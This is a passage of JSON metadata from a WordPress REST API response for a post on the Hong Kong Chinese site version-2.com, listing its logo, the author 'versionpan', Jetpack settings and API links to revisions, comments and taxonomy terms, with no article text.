2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/103ffe36f7fd34a1cc126a30431b94d8","name":"versionpan","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/72541e15024f6716236decb252e7488d4a7359d4df6f8506b01f447174f92c7c?s=96&d=identicon&r=g","caption":"versionpan"},"url":"https:\/\/version-2.com\/zh\/author\/versionpan\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-h1i","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/65428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/148637484"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=65428"}],"version-history":[{"count":8,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/65428\/revisions"}],"predecessor-version":[{"id":69396,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/65428\/revisions\/69396"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=65428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=65428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=65428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}